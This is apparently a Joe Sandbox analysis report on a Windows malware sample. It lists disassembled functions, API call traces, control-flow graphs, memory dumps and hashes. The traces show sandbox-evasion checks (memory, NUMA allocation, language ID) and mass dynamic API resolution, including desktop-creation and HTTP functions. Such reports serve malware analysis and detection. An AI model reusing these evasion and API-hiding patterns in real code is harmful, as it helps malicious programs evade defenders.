                                • GetProcAddress.KERNEL32(76210000,00F715D8), ref: 003B656F
                                • GetProcAddress.KERNEL32(76210000,00F65548), ref: 003B6587
                                • GetProcAddress.KERNEL32(76210000,00F71800), ref: 003B659F
                                • GetProcAddress.KERNEL32(76210000,00F65348), ref: 003B65B8
                                • LoadLibraryA.KERNEL32(00F71818,?,?,?,003B1C03), ref: 003B65C9
                                • LoadLibraryA.KERNEL32(00F71830,?,?,?,003B1C03), ref: 003B65DB
                                • LoadLibraryA.KERNEL32(00F71848,?,?,?,003B1C03), ref: 003B65ED
                                • LoadLibraryA.KERNEL32(00F717E8,?,?,?,003B1C03), ref: 003B65FE
                                • LoadLibraryA.KERNEL32(00F71860,?,?,?,003B1C03), ref: 003B6610
                                • GetProcAddress.KERNEL32(75B30000,00F71878), ref: 003B662D
                                • GetProcAddress.KERNEL32(751E0000,00F71890), ref: 003B6649
                                • GetProcAddress.KERNEL32(751E0000,00F718A8), ref: 003B6661
                                • GetProcAddress.KERNEL32(76910000,00F78F50), ref: 003B667D
                                • GetProcAddress.KERNEL32(75670000,00F654E8), ref: 003B6699
                                • GetProcAddress.KERNEL32(77310000,00F788C8), ref: 003B66B5
                                • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 003B66CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 003B66C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: e7a0b5247e1a5d46a8b49797709fa7763e1952d09237ec659edd9a041c4568ea
                                • Instruction ID: d708d6ba7dff03dd57e4a600e5e8ee6aabadb9cb64b0f01ebcf9bb4457367e27
                                • Opcode Fuzzy Hash: e7a0b5247e1a5d46a8b49797709fa7763e1952d09237ec659edd9a041c4568ea
                                • Instruction Fuzzy Hash: 5DA15DB5A11A00DFD754DF64EC8CE263BB9F7A8740304851AE956E3360EB34A808FB60
                                Function 003B1BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2141 3b1bf0-3b1c0b call 392a90 call 3b6390 2146 3b1c1a-3b1c27 call 392930 2141->2146 2147 3b1c0d 2141->2147 2151 3b1c29-3b1c2f lstrcpy 2146->2151 2152 3b1c35-3b1c63 2146->2152 2149 3b1c10-3b1c18 2147->2149 2149->2146 2149->2149 2151->2152 2156 3b1c6d-3b1c7b GetSystemInfo 2152->2156 2157 3b1c65-3b1c67 ExitProcess 2152->2157 2158 3b1c7d-3b1c7f ExitProcess 2156->2158 2159 3b1c85-3b1ca0 call 391030 call 3910c0 GetUserDefaultLangID 2156->2159 2164 3b1cb8-3b1cca call 3b2ad0 call 3b3e10 2159->2164 2165 3b1ca2-3b1ca9 2159->2165 2171 3b1ccc-3b1cde call 3b2a40 call 3b3e10 2164->2171 2172 3b1ce7-3b1d06 lstrlen call 392930 2164->2172 2165->2164 2166 3b1cb0-3b1cb2 ExitProcess 2165->2166 2171->2172 2185 3b1ce0-3b1ce1 ExitProcess 2171->2185 2177 3b1d08-3b1d0d 2172->2177 2178 3b1d23-3b1d40 lstrlen call 392930 2172->2178 2177->2178 2180 3b1d0f-3b1d11 2177->2180 2186 3b1d5a-3b1d7b call 3b2ad0 lstrlen call 392930 2178->2186 2187 3b1d42-3b1d44 2178->2187 2180->2178 2183 3b1d13-3b1d1d lstrcpy lstrcat 2180->2183 2183->2178 2193 3b1d9a-3b1db4 lstrlen call 392930 2186->2193 2194 3b1d7d-3b1d7f 2186->2194 2187->2186 2188 3b1d46-3b1d54 lstrcpy lstrcat 2187->2188 2188->2186 2199 3b1dce-3b1deb call 3b2a40 lstrlen call 392930 2193->2199 2200 3b1db6-3b1db8 2193->2200 2194->2193 2195 3b1d81-3b1d85 2194->2195 2195->2193 2197 3b1d87-3b1d94 lstrcpy lstrcat 2195->2197 2197->2193 2206 3b1e0a-3b1e0f 2199->2206 2207 3b1ded-3b1def 2199->2207 2200->2199 2201 3b1dba-3b1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2208 3b1e11 call 392a20 2206->2208 2209 3b1e16-3b1e22 call 392930 2206->2209 2207->2206 2210 3b1df1-3b1df5 2207->2210 2208->2209 2215 3b1e30-3b1e66 call 392a20 * 5 OpenEventA 2209->2215 2216 3b1e24-3b1e26 2209->2216 2210->2206 2213 3b1df7-3b1e04 lstrcpy lstrcat 2210->2213 2213->2206 2228 3b1e68-3b1e8a CloseHandle Sleep OpenEventA 2215->2228 2229 3b1e8c-3b1ea0 CreateEventA call 3b1b20 call 3affd0 2215->2229 2216->2215 2217 3b1e28-3b1e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 3b1ea5-3b1eae CloseHandle ExitProcess 2229->2233
                                APIs
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71740), ref: 003B63E9
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71680), ref: 003B6402
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71548), ref: 003B641A
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71560), ref: 003B6432
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F789A8), ref: 003B644B
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F65588), ref: 003B6463
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F655C8), ref: 003B647B
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F717A0), ref: 003B6494
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71650), ref: 003B64AC
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F715F0), ref: 003B64C4
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71758), ref: 003B64DD
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F65408), ref: 003B64F5
                                  • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F71788), ref: 003B650D
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B1C2F
                                • ExitProcess.KERNEL32 ref: 003B1C67
                                • GetSystemInfo.KERNEL32(?), ref: 003B1C71
                                • ExitProcess.KERNEL32 ref: 003B1C7F
                                  • Part of subcall function 00391030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046
                                  • Part of subcall function 00391030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
                                  • Part of subcall function 00391030: ExitProcess.KERNEL32 ref: 00391058
                                  • Part of subcall function 003910C0: GlobalMemoryStatusEx.KERNEL32 ref: 003910EA
                                  • Part of subcall function 003910C0: ExitProcess.KERNEL32 ref: 00391114
                                • GetUserDefaultLangID.KERNEL32 ref: 003B1C8F
                                • ExitProcess.KERNEL32 ref: 003B1CB2
                                • ExitProcess.KERNEL32 ref: 003B1CE1
                                • lstrlen.KERNEL32(00F78A18), ref: 003B1CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B1D15
                                • lstrcat.KERNEL32(00000000,00F78A18), ref: 003B1D1D
                                • lstrlen.KERNEL32(003C4B98), ref: 003B1D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D48
                                • lstrcat.KERNEL32(00000000,003C4B98), ref: 003B1D54
                                • lstrlen.KERNEL32(00000000), ref: 003B1D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003B1D94
                                • lstrlen.KERNEL32(003C4B98), ref: 003B1D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1DBC
                                • lstrcat.KERNEL32(00000000,003C4B98), ref: 003B1DC8
                                • lstrlen.KERNEL32(00000000), ref: 003B1DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003B1E04
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 4df5b91fc4a8364dadf96506fdc1bb61e4bc343f601ff994a1065cb9a125a544
                                • Instruction ID: 18b11a7b9db51c08c13bcce16dd41c21157b242566a7026faa6985082c7abb0f
                                • Opcode Fuzzy Hash: 4df5b91fc4a8364dadf96506fdc1bb61e4bc343f601ff994a1065cb9a125a544
                                • Instruction Fuzzy Hash: 2371A131501A16AFDB22ABB0DC5DFBF7A79AF60705F450028FA06AA591DF30DD05DB60
                                Function 00394A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2850 394a60-394afc RtlAllocateHeap 2867 394b7a-394bbe VirtualProtect 2850->2867 2868 394afe-394b03 2850->2868 2869 394b06-394b78 2868->2869 2869->2867
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00394AA3
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00394BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: 9f6f2e08d4b64d01ae3da0df1f0b7fb86add0426eb1d69430c697715139c1ef4
                                • Instruction ID: c8bc3291207243752d7ad5f08c61b69670abedc8e0962ec493e16fb6f51187fd
                                • Opcode Fuzzy Hash: 9f6f2e08d4b64d01ae3da0df1f0b7fb86add0426eb1d69430c697715139c1ef4
                                • Instruction Fuzzy Hash: AC31F028B8423C769622EBEF4C67FDF6E55DF85BA0B02405AF448D7180CBB15C01CBA2
                                Function 003B2A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003B2A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B2A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 003B2A8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 272cefa2a1785e182c0e61769c60fe5ce1a9c4ff203373a2127a1df0429e502a
                                • Instruction ID: 6803c4045d84f989eb570572f6d232e9c1a553c43e14f5da9e4a4e2b48017651
                                • Opcode Fuzzy Hash: 272cefa2a1785e182c0e61769c60fe5ce1a9c4ff203373a2127a1df0429e502a
                                • Instruction Fuzzy Hash: 50F0B4B5A40A04AFC700DF88DD49F9EBBBCF704B21F000216FA15E3680D774190486A1
                                Function 003B66E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 3b66e0-3b66e7 634 3b6afe-3b6b92 LoadLibraryA * 8 633->634 635 3b66ed-3b6af9 GetProcAddress * 43 633->635 636 3b6c08-3b6c0f 634->636 637 3b6b94-3b6c03 GetProcAddress * 5 634->637 635->634 638 3b6cd2-3b6cd9 636->638 639 3b6c15-3b6ccd GetProcAddress * 8 636->639 637->636 640 3b6cdb-3b6d4a GetProcAddress * 5 638->640 641 3b6d4f-3b6d56 638->641 639->638 640->641 642 3b6de9-3b6df0 641->642 643 3b6d5c-3b6de4 GetProcAddress * 6 641->643 644 3b6f10-3b6f17 642->644 645 3b6df6-3b6f0b GetProcAddress * 12 642->645 643->642 646 3b6f19-3b6f88 GetProcAddress * 5 644->646 647 3b6f8d-3b6f94 644->647 645->644 646->647 648 3b6fc1-3b6fc8 647->648 649 3b6f96-3b6fbc GetProcAddress * 2 647->649 650 3b6fca-3b6ff0 GetProcAddress * 2 648->650 651 3b6ff5-3b6ffc 648->651 649->648 650->651 652 3b70ed-3b70f4 651->652 653 3b7002-3b70e8 GetProcAddress * 10 651->653 654 3b7152-3b7159 652->654 655 3b70f6-3b714d GetProcAddress * 4 652->655 653->652 656 3b715b-3b7169 GetProcAddress 654->656 657 3b716e-3b7175 654->657 655->654 656->657 658 3b71d3 657->658 659 3b7177-3b71ce GetProcAddress * 4 657->659 659->658
                                APIs
                                • GetProcAddress.KERNEL32(76210000,00F65388), ref: 003B66F5
                                • GetProcAddress.KERNEL32(76210000,00F65368), ref: 003B670D
                                • GetProcAddress.KERNEL32(76210000,00F79070), ref: 003B6726
                                • GetProcAddress.KERNEL32(76210000,00F78FE0), ref: 003B673E
                                • GetProcAddress.KERNEL32(76210000,00F79010), ref: 003B6756
                                • GetProcAddress.KERNEL32(76210000,00F7DFF0), ref: 003B676F
                                • GetProcAddress.KERNEL32(76210000,00F6A6A8), ref: 003B6787
                                • GetProcAddress.KERNEL32(76210000,00F7DF90), ref: 003B679F
                                • GetProcAddress.KERNEL32(76210000,00F7DFC0), ref: 003B67B8
                                • GetProcAddress.KERNEL32(76210000,00F7E050), ref: 003B67D0
                                • GetProcAddress.KERNEL32(76210000,00F7DF30), ref: 003B67E8
                                • GetProcAddress.KERNEL32(76210000,00F65688), ref: 003B6801
                                • GetProcAddress.KERNEL32(76210000,00F656E8), ref: 003B6819
                                • GetProcAddress.KERNEL32(76210000,00F653C8), ref: 003B6831
                                • GetProcAddress.KERNEL32(76210000,00F654A8), ref: 003B684A
                                • GetProcAddress.KERNEL32(76210000,00F7DF78), ref: 003B6862
                                • GetProcAddress.KERNEL32(76210000,00F7E038), ref: 003B687A
                                • GetProcAddress.KERNEL32(76210000,00F6A4F0), ref: 003B6893
                                • GetProcAddress.KERNEL32(76210000,00F65448), ref: 003B68AB
                                • GetProcAddress.KERNEL32(76210000,00F7DFA8), ref: 003B68C3
                                • GetProcAddress.KERNEL32(76210000,00F7DEE8), ref: 003B68DC
                                • GetProcAddress.KERNEL32(76210000,00F7DF60), ref: 003B68F4
                                • GetProcAddress.KERNEL32(76210000,00F7DF18), ref: 003B690C
                                • GetProcAddress.KERNEL32(76210000,00F65628), ref: 003B6925
                                • GetProcAddress.KERNEL32(76210000,00F7DFD8), ref: 003B693D
                                • GetProcAddress.KERNEL32(76210000,00F7E020), ref: 003B6955
                                • GetProcAddress.KERNEL32(76210000,00F7E008), ref: 003B696E
                                • GetProcAddress.KERNEL32(76210000,00F7DF00), ref: 003B6986
                                • GetProcAddress.KERNEL32(76210000,00F7DF48), ref: 003B699E
                                • GetProcAddress.KERNEL32(76210000,00F7E068), ref: 003B69B7
                                • GetProcAddress.KERNEL32(76210000,00F7E080), ref: 003B69CF
                                • GetProcAddress.KERNEL32(76210000,00F7DED0), ref: 003B69E7
                                • GetProcAddress.KERNEL32(76210000,00F7DAC8), ref: 003B6A00
                                • GetProcAddress.KERNEL32(76210000,00F6FE08), ref: 003B6A18
                                • GetProcAddress.KERNEL32(76210000,00F7DA08), ref: 003B6A30
                                • GetProcAddress.KERNEL32(76210000,00F7D9D8), ref: 003B6A49
                                • GetProcAddress.KERNEL32(76210000,00F653E8), ref: 003B6A61
                                • GetProcAddress.KERNEL32(76210000,00F7D960), ref: 003B6A79
                                • GetProcAddress.KERNEL32(76210000,00F65468), ref: 003B6A92
                                • GetProcAddress.KERNEL32(76210000,00F7DBB8), ref: 003B6AAA
                                • GetProcAddress.KERNEL32(76210000,00F7DAB0), ref: 003B6AC2
                                • GetProcAddress.KERNEL32(76210000,00F65568), ref: 003B6ADB
                                • GetProcAddress.KERNEL32(76210000,00F65488), ref: 003B6AF3
                                • LoadLibraryA.KERNEL32(00F7DA50,003B051F), ref: 003B6B05
                                • LoadLibraryA.KERNEL32(00F7D948), ref: 003B6B16
                                • LoadLibraryA.KERNEL32(00F7D8D0), ref: 003B6B28
                                • LoadLibraryA.KERNEL32(00F7D990), ref: 003B6B3A
                                • LoadLibraryA.KERNEL32(00F7D9A8), ref: 003B6B4B
                                • LoadLibraryA.KERNEL32(00F7D9C0), ref: 003B6B5D
                                • LoadLibraryA.KERNEL32(00F7D918), ref: 003B6B6F
                                • LoadLibraryA.KERNEL32(00F7D930), ref: 003B6B80
                                • GetProcAddress.KERNEL32(751E0000,00F651A8), ref: 003B6B9C
                                • GetProcAddress.KERNEL32(751E0000,00F7DB40), ref: 003B6BB4
                                • GetProcAddress.KERNEL32(751E0000,00F78A08), ref: 003B6BCD
                                • GetProcAddress.KERNEL32(751E0000,00F7DAE0), ref: 003B6BE5
                                • GetProcAddress.KERNEL32(751E0000,00F652C8), ref: 003B6BFD
                                • GetProcAddress.KERNEL32(700F0000,00F6A6D0), ref: 003B6C1D
                                • GetProcAddress.KERNEL32(700F0000,00F64F88), ref: 003B6C35
                                • GetProcAddress.KERNEL32(700F0000,00F6A518), ref: 003B6C4E
                                • GetProcAddress.KERNEL32(700F0000,00F7DAF8), ref: 003B6C66
                                • GetProcAddress.KERNEL32(700F0000,00F7DA98), ref: 003B6C7E
                                • GetProcAddress.KERNEL32(700F0000,00F65288), ref: 003B6C97
                                • GetProcAddress.KERNEL32(700F0000,00F64F48), ref: 003B6CAF
                                • GetProcAddress.KERNEL32(700F0000,00F7D900), ref: 003B6CC7
                                • GetProcAddress.KERNEL32(753A0000,00F65148), ref: 003B6CE3
                                • GetProcAddress.KERNEL32(753A0000,00F651C8), ref: 003B6CFB
                                • GetProcAddress.KERNEL32(753A0000,00F7D978), ref: 003B6D14
                                • GetProcAddress.KERNEL32(753A0000,00F7D9F0), ref: 003B6D2C
                                • GetProcAddress.KERNEL32(753A0000,00F651E8), ref: 003B6D44
                                • GetProcAddress.KERNEL32(76310000,00F6A568), ref: 003B6D64
                                • GetProcAddress.KERNEL32(76310000,00F6A5B8), ref: 003B6D7C
                                • GetProcAddress.KERNEL32(76310000,00F7DA20), ref: 003B6D95
                                • GetProcAddress.KERNEL32(76310000,00F65308), ref: 003B6DAD
                                • GetProcAddress.KERNEL32(76310000,00F65208), ref: 003B6DC5
                                • GetProcAddress.KERNEL32(76310000,00F6A5E0), ref: 003B6DDE
                                • GetProcAddress.KERNEL32(76910000,00F7DA38), ref: 003B6DFE
                                • GetProcAddress.KERNEL32(76910000,00F65268), ref: 003B6E16
                                • GetProcAddress.KERNEL32(76910000,00F78998), ref: 003B6E2F
                                • GetProcAddress.KERNEL32(76910000,00F7DA68), ref: 003B6E47
                                • GetProcAddress.KERNEL32(76910000,00F7DB10), ref: 003B6E5F
                                • GetProcAddress.KERNEL32(76910000,00F65328), ref: 003B6E78
                                • GetProcAddress.KERNEL32(76910000,00F650E8), ref: 003B6E90
                                • GetProcAddress.KERNEL32(76910000,00F7DB28), ref: 003B6EA8
                                • GetProcAddress.KERNEL32(76910000,00F7D8E8), ref: 003B6EC1
                                • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 003B6ED7
                                • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 003B6EEE
                                • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 003B6F05
                                • GetProcAddress.KERNEL32(75B30000,00F650C8), ref: 003B6F21
                                • GetProcAddress.KERNEL32(75B30000,00F7DA80), ref: 003B6F39
                                • GetProcAddress.KERNEL32(75B30000,00F7DB58), ref: 003B6F52
                                • GetProcAddress.KERNEL32(75B30000,00F7DB70), ref: 003B6F6A
                                • GetProcAddress.KERNEL32(75B30000,00F7DB88), ref: 003B6F82
                                • GetProcAddress.KERNEL32(75670000,00F64FA8), ref: 003B6F9E
                                • GetProcAddress.KERNEL32(75670000,00F652E8), ref: 003B6FB6
                                • GetProcAddress.KERNEL32(76AC0000,00F64F68), ref: 003B6FD2
                                • GetProcAddress.KERNEL32(76AC0000,00F7DBA0), ref: 003B6FEA
                                • GetProcAddress.KERNEL32(6F4E0000,00F65048), ref: 003B700A
                                • GetProcAddress.KERNEL32(6F4E0000,00F64FC8), ref: 003B7022
                                • GetProcAddress.KERNEL32(6F4E0000,00F65228), ref: 003B703B
                                • GetProcAddress.KERNEL32(6F4E0000,00F7DBD0), ref: 003B7053
                                • GetProcAddress.KERNEL32(6F4E0000,00F64FE8), ref: 003B706B
                                • GetProcAddress.KERNEL32(6F4E0000,00F65088), ref: 003B7084
                                • GetProcAddress.KERNEL32(6F4E0000,00F65108), ref: 003B709C
                                • GetProcAddress.KERNEL32(6F4E0000,00F65248), ref: 003B70B4
                                • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 003B70CB
                                • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 003B70E2
                                • GetProcAddress.KERNEL32(75AE0000,00F7DEA0), ref: 003B70FE
                                • GetProcAddress.KERNEL32(75AE0000,00F78A28), ref: 003B7116
                                • GetProcAddress.KERNEL32(75AE0000,00F7DE70), ref: 003B712F
                                • GetProcAddress.KERNEL32(75AE0000,00F7DE88), ref: 003B7147
                                • GetProcAddress.KERNEL32(76300000,00F652A8), ref: 003B7163
                                • GetProcAddress.KERNEL32(6E950000,00F7DCF0), ref: 003B717F
                                • GetProcAddress.KERNEL32(6E950000,00F650A8), ref: 003B7197
                                • GetProcAddress.KERNEL32(6E950000,00F7DE58), ref: 003B71B0
                                • GetProcAddress.KERNEL32(6E950000,00F7DC18), ref: 003B71C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
